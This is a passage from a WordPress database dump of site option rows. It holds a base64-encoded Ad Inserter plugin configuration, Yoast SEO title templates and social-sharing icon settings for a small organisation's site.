zoxOiIwIjtzOjE2OiJESVNBQkxFX0NTU19DT0RFIjtzOjE6IjAiO3M6MTU6IkRJU0FCTEVfSlNfQ09ERSI7czoxOiIwIjtzOjE5OiJESVNBQkxFX0hFQURFUl9DT0RFIjtzOjE6IjAiO3M6MTk6IkRJU0FCTEVfRk9PVEVSX0NPREUiO3M6MToiMCI7czoxNToiVklFV1BPUlRfTkFNRV8xIjtzOjc6IkRlc2t0b3AiO3M6MTY6IlZJRVdQT1JUX1dJRFRIXzEiO2k6OTgwO3M6MTU6IlZJRVdQT1JUX05BTUVfMiI7czo2OiJUYWJsZXQiO3M6MTY6IlZJRVdQT1JUX1dJRFRIXzIiO2k6NzY4O3M6MTU6IlZJRVdQT1JUX05BTUVfMyI7czo1OiJQaG9uZSI7czoxNjoiVklFV1BPUlRfV0lEVEhfMyI7aTowO3M6MTU6IlZJRVdQT1JUX05BTUVfNCI7czowOiIiO3M6MTY6IlZJRVdQT1JUX1dJRFRIXzQiO3M6MDoiIjtzOjE1OiJWSUVXUE9SVF9OQU1FXzUiO3M6MDoiIjtzOjE2OiJWSUVXUE9SVF9XSURUSF81IjtzOjA6IiI7czoxNToiVklFV1BPUlRfTkFNRV82IjtzOjA6IiI7czoxNjoiVklFV1BPUlRfV0lEVEhfNiI7czowOiIiO3M6MTQ6IkhPT0tfRU5BQkxFRF8xIjtzOjE6IjAiO3M6MTE6IkhPT0tfTkFNRV8xIjtzOjA6IiI7czoxMzoiSE9PS19BQ1RJT05fMSI7czowOiIiO3M6MTU6IkhPT0tfUFJJT1JJVFlfMSI7aToxMDtzOjE0OiJIT09LX0VOQUJMRURfMiI7czoxOiIwIjtzOjExOiJIT09LX05BTUVfMiI7czowOiIiO3M6MTM6IkhPT0tfQUNUSU9OXzIiO3M6MDoiIjtzOjE1OiJIT09LX1BSSU9SSVRZXzIiO2k6MTA7czoxNDoiSE9PS19FTkFCTEVEXzMiO3M6MToiMCI7czoxMToiSE9PS19OQU1FXzMiO3M6MDoiIjtzOjEzOiJIT09LX0FDVElPTl8zIjtzOjA6IiI7czoxNToiSE9PS19QUklPUklUWV8zIjtpOjEwO3M6MTQ6IkhPT0tfRU5BQkxFRF80IjtzOjE6IjAiO3M6MTE6IkhPT0tfTkFNRV80IjtzOjA6IiI7czoxMzoiSE9PS19BQ1RJT05fNCI7czowOiIiO3M6MTU6IkhPT0tfUFJJT1JJVFlfNCI7aToxMDtzOjE0OiJIT09LX0VOQUJMRURfNSI7czoxOiIwIjtzOjExOiJIT09LX05BTUVfNSI7czowOiIiO3M6MTM6IkhPT0tfQUNUSU9OXzUiO3M6MDoiIjtzOjE1OiJIT09LX1BSSU9SSVRZXzUiO2k6MTA7czoxNDoiSE9PS19FTkFCTEVEXzYiO3M6MToiMCI7czoxMToiSE9PS19OQU1FXzYiO3M6MDoiIjtzOjEzOiJIT09LX0FDVElPTl82IjtzOjA6IiI7czoxNToiSE9PS19QUklPUklUWV82IjtpOjEwO3M6MTQ6IkhPT0tfRU5BQkxFRF83IjtzOjE6IjAiO3M6MTE6IkhPT0tfTkFNRV83IjtzOjA6IiI7czoxMzoiSE9PS19BQ1RJT05fNyI7czowOiIiO3M6MTU6IkhPT0tfUFJJT1JJVFlfNyI7aToxMDtzOjE0OiJIT09LX0VOQUJMRURfOCI7czoxOiIwIjtzOjExOiJIT09LX05BTUVfOCI7czowOiIiO3M6MTM6IkhPT0tfQUNUSU9OXzgiO3M6MDoiIjtzOjE1OiJIT09LX1BSSU9SSVRZXzgiO2k6MTA7czoxNDoiSE9PS19FTkFCTEVEXzkiO3M6MToiMCI7czoxMToiSE9PS19OQU1FXzkiO3M6MDoiIjtzOjEzOiJIT09LX0FDVElPTl85IjtzOjA6IiI7czoxNToiSE9PS19QUklPUklUWV85IjtpOjEwO3M6MTU6IkhPT0tfRU5BQkxFRF8xMCI7czoxOiIwIjtzOjEyOiJIT09LX05BTUVfMTAiO3M6MDoiIjtzOjE0OiJIT09LX0FDVElPTl8xMCI7czowOiIiO3M6MTY6IkhPT0tfUFJJT1JJVFlfMTAiO2k6MTA7czoxNToiSE9PS19FTkFCTEVEXzExIjtzOjE6IjAiO3M6MTI6IkhPT0tfTkFNRV8xMSI7czowOiIiO3M6MTQ6IkhPT0tfQUNUSU9OXzExIjtzOjA6IiI7czoxNjoiSE9PS19QUklPUklUWV8xMSI7aToxMDtzOjE1OiJIT09LX0VOQUJMRURfMTIiO3M6MToiMCI7czoxMjoiSE9PS19OQU1FXzEyIjtzOjA6IiI7czoxNDoiSE9PS19BQ1RJT05fMTIiO3M6MDoiIjtzOjE2OiJIT09LX1BSSU9SSVRZXzEyIjtpOjEwO3M6MTU6IkhPT0tfRU5BQkxFRF8xMyI7czoxOiIwIjtzOjEyOiJIT09LX05BTUVfMTMiO3M6MDoiIjtzOjE0OiJIT09LX0FDVElPTl8xMyI7czowOiIiO3M6MTY6IkhPT0tfUFJJT1JJVFlfMTMiO2k6MTA7czoxNToiSE9PS19FTkFCTEVEXzE0IjtzOjE6IjAiO3M6MTI6IkhPT0tfTkFNRV8xNCI7czowOiIiO3M6MTQ6IkhPT0tfQUNUSU9OXzE0IjtzOjA6IiI7czoxNjoiSE9PS19QUklPUklUWV8xNCI7aToxMDtzOjE1OiJIT09LX0VOQUJMRURfMTUiO3M6MToiMCI7czoxMjoiSE9PS19OQU1FXzE1IjtzOjA6IiI7czoxNDoiSE9PS19BQ1RJT05fMTUiO3M6MDoiIjtzOjE2OiJIT09LX1BSSU9SSVRZXzE1IjtpOjEwO3M6MTU6IkhPT0tfRU5BQkxFRF8xNiI7czoxOiIwIjtzOjEyOiJIT09LX05BTUVfMTYiO3M6MDoiIjtzOjE0OiJIT09LX0FDVElPTl8xNiI7czowOiIiO3M6MTY6IkhPT0tfUFJJT1JJVFlfMTYiO2k6MTA7czoxNToiSE9PS19FTkFCTEVEXzE3IjtzOjE6IjAiO3M6MTI6IkhPT0tfTkFNRV8xNyI7czowOiIiO3M6MTQ6IkhPT0tfQUNUSU9OXzE3IjtzOjA6IiI7czoxNjoiSE9PS19QUklPUklUWV8xNyI7aToxMDtzOjE1OiJIT09LX0VOQUJMRURfMTgiO3M6MToiMCI7czoxMjoiSE9PS19OQU1FXzE4IjtzOjA6IiI7czoxNDoiSE9PS19BQ1RJT05fMTgiO3M6MDoiIjtzOjE2OiJIT09LX1BSSU9SSVRZXzE4IjtpOjEwO3M6MTU6IkhPT0tfRU5BQkxFRF8xOSI7czoxOiIwIjtzOjEyOiJIT09LX05BTUVfMTkiO3M6MDoiIjtzOjE0OiJIT09LX0FDVElPTl8xOSI7czowOiIiO3M6MTY6IkhPT0tfUFJJT1JJVFlfMTkiO2k6MTA7czoxNToiSE9PS19FTkFCTEVEXzIwIjtzOjE6IjAiO3M6MTI6IkhPT0tfTkFNRV8yMCI7czowOiIiO3M6MTQ6IkhPT0tfQUNUSU9OXzIwIjtzOjA6IiI7czoxNjoiSE9PS19QUklPUklUWV8yMCI7aToxMDtzOjEyOiJWSUVXUE9SVF9DU1MiO3M6NjA1OiIuYWktdmlld3BvcnRzICAgICAgICAgICAgICAgICB7LS1haTogMTt9Ci5haS12aWV3cG9ydC0zICAgICAgICAgICAgICAgIHsgZGlzcGxheTogbm9uZSAhaW1wb3J0YW50O30KLmFpLXZpZXdwb3J0LTIgICAgICAgICAgICAgICAgeyBkaXNwbGF5OiBub25lICFpbXBvcnRhbnQ7fQouYWktdmlld3BvcnQtMSAgICAgICAgICAgICAgICB7IGRpc3BsYXk6IGluaGVyaXQgIWltcG9ydGFudDt9Ci5haS12aWV3cG9ydC0wICAgICAgICAgICAgICAgIHsgZGlzcGxheTogbm9uZSAhaW1wb3J0YW50O30KQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSBhbmQgKG1heC13aWR0aDogOTc5cHgpIHsKLmFpLXZpZXdwb3J0LTEgICAgICAgICAgICAgICAgeyBkaXNwbGF5OiBub25lICFpbXBvcnRhbnQ7fQouYWktdmlld3BvcnQtMiAgICAgICAgICAgICAgICB7IGRpc3BsYXk6IGluaGVyaXQgIWltcG9ydGFudDt9Cn0KQG1lZGlhIChtYXgtd2lkdGg6IDc2N3B4KSB7Ci5haS12aWV3cG9ydC0xICAgICAgICAgICAgICAgIHsgZGlzcGxheTogbm9uZSAhaW1wb3J0YW50O30KLmFpLXZpZXdwb3J0LTMgICAgICAgICAgICAgICAgeyBkaXNwbGF5OiBpbmhlcml0ICFpbXBvcnRhbnQ7fQp9CiI7czoxMzoiQUxJR05NRU5UX0NTUyI7czo1MDoiLmNvZGUtYmxvY2stZGVmYXVsdCB7bWFyZ2luOiA4cHggMDsgY2xlYXI6IGJvdGg7fQoiO3M6OToiVElNRVNUQU1QIjtpOjE2MTMwNjE1OTY7fXM6NzoiZXh0cmFjdCI7YToxNTp7czoxMToidXNlZF9ibG9ja3MiO3M6MzA6ImE6Mzp7aTowO2k6MTtpOjE7aToyO2k6MjtpOjM7fSI7czo4OiJmZWF0dXJlcyI7YToxMjp7aTo1NztiOjA7aTo2O2I6MDtpOjc7YjowO2k6Mjk7YjowO2k6MzE7YjowO2k6OTtiOjA7aToyNjtiOjA7aTo1MztiOjA7aTo0NjtiOjA7aTozMztiOjA7aTozNztiOjA7aTozOTtiOjA7fXM6MTc6ImFib3ZlX2hlYWRlcl9ob29rIjthOjEwOntpOjA7YTowOnt9aTozO2E6MDp7fWk6NDthOjA6e31pOjY7YTowOnt9aTo1O2E6MDp7fWk6MTthOjA6e31pOjI7YTowOnt9aTo3O2E6MDp7fWk6ODthOjA6e31pOjEwO2E6MDp7fX1zOjE3OiJodG1sX2VsZW1lbnRfaG9vayI7YToxMDp7aTowO2E6MDp7fWk6MzthOjA6e31pOjQ7YTowOnt9aTo2O2E6MDp7fWk6NTthOjA6e31pOjE7YTowOnt9aToyO2E6MDp7fWk6NzthOjA6e31pOjg7YTowOnt9aToxMDthOjA6e319czoxMjoiY29udGVudF9ob29rIjthOjEwOntpOjA7YToyOntpOjA7aToyO2k6MTtpOjM7fWk6MzthOjA6e31pOjQ7YToxOntpOjA7aTozO31pOjY7YToxOntpOjA7aTozO31pOjU7YTowOnt9aToxO2E6MDp7fWk6MjthOjI6e2k6MDtpOjI7aToxO2k6Mzt9aTo3O2E6MDp7fWk6ODthOjA6e31pOjEwO2E6Mjp7aTowO2k6MjtpOjE7aTozO319czoxMjoiZXhjZXJwdF9ob29rIjthOjEwOntpOjA7YTowOnt9aTozO2E6MDp7fWk6NDthOjA6e31pOjY7YTowOnt9aTo1O2E6MDp7fWk6MTthOjA6e31pOjI7YTowOnt9aTo3O2E6MDp7fWk6ODthOjA6e31pOjEwO2E6MDp7fX1zOjE1OiJsb29wX3N0YXJ0X2hvb2siO2E6MTA6e2k6MDthOjE6e2k6MDtpOjE7fWk6MzthOjE6e2k6MDtpOjE7fWk6NDthOjA6e31pOjY7YTowOnt9aTo1O2E6MDp7fWk6MTthOjA6e31pOjI7YToxOntpOjA7aToxO31pOjc7YTowOnt9aTo4O2E6MDp7fWk6MTA7YToxOntpOjA7aToxO319czoxMzoibG9vcF9lbmRfaG9vayI7YToxMDp7aTowO2E6MDp7fWk6MzthOjA6e31pOjQ7YTowOnt9aTo2O2E6MDp7fWk6NTthOjA6e31pOjE7YTowOnt9aToyO2E6MDp7fWk6NzthOjA6e31pOjg7YTowOnt9aToxMDthOjA6e319czoxMzoidGhlX3Bvc3RfaG9vayI7YToxMDp7aTowO2E6MDp7fWk6MzthOjA6e31pOjQ7YTowOnt9aTo2O2E6MDp7fWk6NTthOjA6e31pOjE7YTowOnt9aToyO2E6MDp7fWk6NzthOjA6e31pOjg7YTowOnt9aToxMDthOjA6e319czoyMDoiYmVmb3JlX2NvbW1lbnRzX2hvb2siO2E6MTA6e2k6MDthOjA6e31pOjM7YTowOnt9aTo0O2E6MDp7fWk6NjthOjA6e31pOjU7YTowOnt9aToxO2E6MDp7fWk6MjthOjA6e31pOjc7YTowOnt9aTo4O2E6MDp7fWk6MTA7YTowOnt9fXM6MjE6ImJldHdlZW5fY29tbWVudHNfaG9vayI7YToxMDp7aTowO2E6MDp7fWk6MzthOjA6e31pOjQ7YTowOnt9aTo2O2E6MDp7fWk6NTthOjA6e31pOjE7YTowOnt9aToyO2E6MDp7fWk6NzthOjA6e31pOjg7YTowOnt9aToxMDthOjA6e319czoxOToiYWZ0ZXJfY29tbWVudHNfaG9vayI7YToxMDp7aTowO2E6MDp7fWk6MzthOjA6e31pOjQ7YTowOnt9aTo2O2E6MDp7fWk6NTthOjA6e31pOjE7YTowOnt9aToyO2E6MDp7fWk6NzthOjA6e31pOjg7YTowOnt9aToxMDthOjA6e319czoxNDoid3BfZm9vdGVyX2hvb2siO2E6MTA6e2k6MDthOjA6e31pOjM7YTowOnt9aTo0O2E6MDp7fWk6NjthOjA6e31pOjU7YTowOnt9aToxO2E6MDp7fWk6MjthOjA6e31pOjc7YTowOnt9aTo4O2E6MDp7fWk6MTA7YTowOnt9fXM6NzoiVkVSU0lPTiI7czo5OiIwMjA2MDUtOTYiO3M6OToiVElNRVNUQU1QIjtpOjE2MTMwNjE1OTY7fX0=','yes'),(307,'ai-install','1522700851','yes'),(314,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:10;}}','yes'),(325,'wpseo','a:20:{s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:4:\"11.0\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";s:0:\"\";s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1522701872;s:13:\"myyoast-oauth\";b:0;}','yes'),(326,'wpseo_titles','a:64:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:1;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:12:\"website_name\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:0:\"\";s:17:\"stripcategorybase\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;s:23:\"post_types-post-maintax\";i:0;}','yes'),(327,'wpseo_social','a:17:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:19:\"summary_large_image\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:0:\"\";}','yes'),(328,'wpseo_flush_rewrite','1','yes'),(329,'mashsb_settings','a:0:{}','yes'),(336,'show_new_notification','yes','yes'),(337,'show_premium_cumulative_count_notification','yes','yes'),(338,'sfsi_section1_options','s:581:\"a:16:{s:16:\"sfsi_rss_display\";s:3:\"yes\";s:18:\"sfsi_email_display\";s:3:\"yes\";s:21:\"sfsi_facebook_display\";s:3:\"yes\";s:20:\"sfsi_twitter_display\";s:3:\"yes\";s:18:\"sfsi_share_display\";s:2:\"no\";s:22:\"sfsi_pinterest_display\";s:2:\"no\";s:22:\"sfsi_instagram_display\";s:2:\"no\";s:21:\"sfsi_linkedin_display\";s:2:\"no\";s:20:\"sfsi_youtube_display\";s:2:\"no\";s:19:\"sfsi_custom_display\";s:0:\"\";s:17:\"sfsi_custom_files\";s:0:\"\";s:21:\"sfsi_telegram_display\";s:2:\"no\";s:15:\"sfsi_vk_display\";s:2:\"no\";s:15:\"sfsi_ok_display\";s:2:\"no\";s:19:\"sfsi_wechat_display\";s:2:\"no\";s:18:\"sfsi_weibo_display\";s:2:\"no\";}\";','yes'),(339,'sfsi_section2_options','s:1791:\"a:36:{s:12:\"sfsi_rss_url\";s:36:\"http://www.westonspirit.org.uk/feed/\";s:14:\"sfsi_rss_icons\";s:5:\"email\";s:14:\"sfsi_email_url\";s:296:\"http://www.specificfeeds.com/widgets/emailSubscribeEncFeed/ZU51amp6ZFVCaFRLWXgxQko4d0NRRmZrTEV3MVJFVmc5YzhyUDhiNkh1bjM1ZHhnd1VxWlZZQWtSbjdnYzQ5clh2bTlFUTllWVdQMm1lMkZySGJlVktVWnU2ZlVuNmN5Qlk2SFpZclVtY0N2OTFCUk5vKzJhN09lL2xsRWNOd3l8am5mVklQNTk0YmRrTEVpWFhoaUpka3MyamdaQ1BidmQ4M0dnTnlvWG5uaz0=/OA==\";s:24:\"sfsi_facebookPage_option\";s:2:\"no\";s:21:\"sfsi_facebookPage_url\";s:0:\"\";s:24:\"sfsi_facebookLike_option\";s:3:\"yes\";s:25:\"sfsi_facebookShare_option\";s:3:\"yes\";s:21:\"sfsi_twitter_followme\";s:2:\"no\";s:27:\"sfsi_twitter_followUserName\";s:0:\"\";s:22:\"sfsi_twitter_aboutPage\";s:3:\"yes\";s:17:\"sfsi_twitter_page\";s:2:\"no\";s:20:\"sfsi_twitter_pageURL\";s:0:\"\";s:26:\"sfsi_twitter_aboutPageText\";s:82:\"Hey, check out this cool site I found: www.yourname.com #Topic via@my_twitter_name\";s:20:\"sfsi_youtube_pageUrl\";s:0:\"\";s:17:\"sfsi_youtube_page\";s:2:\"no\";s:19:\"sfsi_youtube_follow\";s:2:\"no\";s:19:\"sfsi_pinterest_page\";s:2:\"no\";s:22:\"sfsi_pinterest_pageUrl\";s:0:\"\";s:23:\"sfsi_pinterest_pingBlog\";s:0:\"\";s:19:\"sfsi_instagram_page\";s:2:\"no\";s:22:\"sfsi_instagram_pageUrl\";s:0:\"\";s:18:\"sfsi_linkedin_page\";s:2:\"no\";s:21:\"sfsi_linkedin_pageURL\";s:0:\"\";s:20:\"sfsi_linkedin_follow\";s:2:\"no\";s:27:\"sfsi_linkedin_followCompany\";s:0:\"\";s:23:\"sfsi_linkedin_SharePage\";s:3:\"yes\";s:30:\"sfsi_linkedin_recommendBusines\";s:2:\"no\";s:30:\"sfsi_linkedin_recommendCompany\";s:0:\"\";s:32:\"sfsi_linkedin_recommendProductId\";s:0:\"\";s:21:\"sfsi_CustomIcon_links\";s:0:\"\";s:24:\"sfsi_youtubeusernameorid\";s:4:\"name\";s:17:\"sfsi_ytube_chnlid\";s:0:\"\";s:23:\"sfsi_wechatShare_option\";s:3:\"yes\";s:21:\"sfsi_telegram_message\";s:0:\"\";s:25:\"sfsi_telegram_messageName\";s:0:\"\";s:22:\"sfsi_telegram_username\";s:0:\"\";}\";','yes'),(340,'sfsi_section3_options','s:272:\"a:7:{s:14:\"sfsi_mouseOver\";s:2:\"no\";s:21:\"sfsi_mouseOver_effect\";s:7:\"fade_in\";s:18:\"sfsi_shuffle_icons\";s:2:\"no\";s:22:\"sfsi_shuffle_Firstload\";s:2:\"no\";s:21:\"sfsi_shuffle_interval\";s:2:\"no\";s:25:\"sfsi_shuffle_intervalTime\";s:0:\"\";s:18:\"sfsi_actvite_theme\";s:7:\"default\";}\";','yes'),(341,'sfsi_section4_options','s:2424:\"a:61:{s:19:\"sfsi_display_counts\";s:2:\"no\";s:24:\"sfsi_email_countsDisplay\";s:2:\"no\";s:21:\"sfsi_email_countsFrom\";s:6:\"source\";s:23:\"sfsi_email_manualCounts\";s:2:\"20\";s:22:\"sfsi_rss_countsDisplay\";s:2:\"no\";s:21:\"sfsi_rss_manualCounts\";s:2:\"20\";s:22:\"sfsi_facebook_PageLink\";s:0:\"\";s:27:\"sfsi_facebook_countsDisplay\";s:2:\"no\";s:24:\"sfsi_facebook_countsFrom\";s:6:\"manual\";s:26:\"sfsi_facebook_manualCounts\";s:2:\"20\";s:26:\"sfsi_twitter_countsDisplay\";s:2:\"no\";s:23:\"sfsi_twitter_countsFrom\";s:6:\"manual\";s:25:\"sfsi_twitter_manualCounts\";s:2:\"20\";s:19:\"sfsi_google_api_key\";s:0:\"\";s:27:\"sfsi_linkedIn_countsDisplay\";s:2:\"no\";s:24:\"sfsi_linkedIn_countsFrom\";s:6:\"manual\";s:26:\"sfsi_linkedIn_manualCounts\";s:2:\"20\";s:10:\"ln_api_key\";s:0:\"\";s:13:\"ln_secret_key\";s:0:\"\";s:19:\"ln_oAuth_user_token\";s:0:\"\";s:10:\"ln_company\";s:0:\"\";s:24:\"sfsi_youtubeusernameorid\";s:4:\"name\";s:17:\"sfsi_youtube_user\";s:0:\"\";s:22:\"sfsi_youtube_channelId\";s:0:\"\";s:17:\"sfsi_ytube_chnlid\";s:0:\"\";s:26:\"sfsi_youtube_countsDisplay\";s:2:\"no\";s:23:\"sfsi_youtube_countsFrom\";s:6:\"manual\";s:25:\"sfsi_youtube_manualCounts\";s:2:\"20\";s:28:\"sfsi_pinterest_countsDisplay\";s:2:\"no\";s:25:\"sfsi_pinterest_countsFrom\";s:6:\"manual\";s:27:\"sfsi_pinterest_manualCounts\";s:2:\"20\";s:19:\"sfsi_pinterest_user\";s:0:\"\";s:20:\"sfsi_pinterest_board\";s:0:\"\";s:25:\"sfsi_instagram_countsFrom\";s:6:\"manual\";s:28:\"sfsi_instagram_countsDisplay\";s:2:\"no\";s:27:\"sfsi_instagram_manualCounts\";s:2:\"20\";s:19:\"sfsi_instagram_User\";s:0:\"\";s:25:\"sfsi_shares_countsDisplay\";s:2:\"no\";s:22:\"sfsi_shares_countsFrom\";s:6:\"manual\";s:24:\"sfsi_shares_manualCounts\";s:2:\"20\";s:23:\"sfsi_instagram_clientid\";s:0:\"\";s:21:\"sfsi_instagram_appurl\";s:0:\"\";s:20:\"sfsi_instagram_token\";s:0:\"\";s:27:\"sfsi_telegram_countsDisplay\";s:2:\"no\";s:24:\"sfsi_telegram_countsFrom\";s:6:\"manual\";s:26:\"sfsi_telegram_manualCounts\";s:2:\"20\";s:21:\"sfsi_vk_countsDisplay\";s:2:\"no\";s:18:\"sfsi_vk_countsFrom\";s:6:\"manual\";s:20:\"sfsi_vk_manualCounts\";s:2:\"20\";s:21:\"sfsi_ok_countsDisplay\";s:2:\"no\";s:18:\"sfsi_ok_countsFrom\";s:6:\"manual\";s:20:\"sfsi_ok_manualCounts\";s:2:\"20\";s:24:\"sfsi_weibo_countsDisplay\";s:2:\"no\";s:21:\"sfsi_weibo_countsFrom\";s:6:\"manual\";s:23:\"sfsi_weibo_manualCounts\";s:2:\"20\";s:25:\"sfsi_wechat_countsDisplay\";s:2:\"no\";s:22:\"sfsi_wechat_countsFrom\";s:6:\"manual\";s:24:\"sfsi_wechat_manualCounts\";s:2:\"20\";s:17:\"sfsi_round_counts\";s:2:\"no\";s:20:\"sfsi_original_counts\";s:2:\"no\";s:27:\"sfsi_responsive_share_count\";s:2:\"no\";}\";','yes'),(342,'sfsi_section5_options','s:1669:\"a:40:{s:15:\"sfsi_icons_size\";s:2:\"40\";s:18:\"sfsi_icons_spacing\";s:1:\"5\";s:20:\"sfsi_icons_Alignment\";s:4:\"left\";s:17:\"sfsi_icons_perRow\";s:1:\"5\";s:24:\"sfsi_icons_ClickPageOpen\";s:3:\"yes\";s:16:\"sfsi_icons_stick\";s:2:\"no\";s:18:\"sfsi_rssIcon_order\";s:1:\"1\";s:20:\"sfsi_emailIcon_order\";s:1:\"2\";s:23:\"sfsi_facebookIcon_order\";s:1:\"3\";s:22:\"sfsi_twitterIcon_order\";s:1:\"5\";s:20:\"sfsi_shareIcon_order\";s:1:\"6\";s:22:\"sfsi_youtubeIcon_order\";s:1:\"7\";s:24:\"sfsi_pinterestIcon_order\";s:1:\"8\";s:23:\"sfsi_linkedinIcon_order\";s:1:\"9\";s:24:\"sfsi_instagramIcon_order\";s:2:\"10\";s:22:\"sfsi_CustomIcons_order\";s:0:\"\";s:22:\"sfsi_rss_MouseOverText\";s:3:\"RSS\";s:24:\"sfsi_email_MouseOverText\";s:15:\"Follow by Email\";s:26:\"sfsi_twitter_MouseOverText\";s:7:\"Twitter\";s:27:\"sfsi_facebook_MouseOverText\";s:8:\"Facebook\";s:27:\"sfsi_linkedIn_MouseOverText\";s:8:\"LinkedIn\";s:28:\"sfsi_pinterest_MouseOverText\";s:9:\"Pinterest\";s:28:\"sfsi_instagram_MouseOverText\";s:9:\"Instagram\";s:26:\"sfsi_youtube_MouseOverText\";s:7:\"YouTube\";s:24:\"sfsi_share_MouseOverText\";s:5:\"Share\";s:26:\"sfsi_custom_MouseOverTexts\";s:0:\"\";s:23:\"sfsi_custom_social_hide\";s:2:\"no\";s:32:\"sfsi_pplus_icons_suppress_errors\";s:2:\"no\";s:23:\"sfsi_telegramIcon_order\";s:2:\"11\";s:17:\"sfsi_vkIcon_order\";s:2:\"12\";s:17:\"sfsi_okIcon_order\";s:2:\"13\";s:20:\"sfsi_weiboIcon_order\";s:2:\"14\";s:21:\"sfsi_wechatIcon_order\";s:2:\"15\";s:27:\"sfsi_telegram_MouseOverText\";s:8:\"Telegram\";s:21:\"sfsi_vk_MouseOverText\";s:2:\"VK\";s:21:\"sfsi_ok_MouseOverText\";s:2:\"OK\";s:24:\"sfsi_weibo_MouseOverText\";s:5:\"Weibo\";s:25:\"sfsi_wechat_MouseOverText\";s:6:\"WeChat\";s:31:\"sfsi_icons_Alignment_via_widget\";s:4:\"left\";s:34:\"sfsi_icons_Alignment_via_shortcode\";s:4:\"left\";}\";','yes'),(343,'sfsi_section6_options','s:1404:\"a:18:{s:17:\"sfsi_show_Onposts\";s:2:\"no\";s:18:\"sfsi_show_Onbottom\";s:2:\"no\";s:22:\"sfsi_icons_postPositon\";s:6:\"source\";s:20:\"sfsi_icons_alignment\";s:12:\"center-right\";s:22:\"sfsi_rss_countsDisplay\";s:2:\"no\";s:20:\"sfsi_textBefor_icons\";s:26:\"Please follow and like 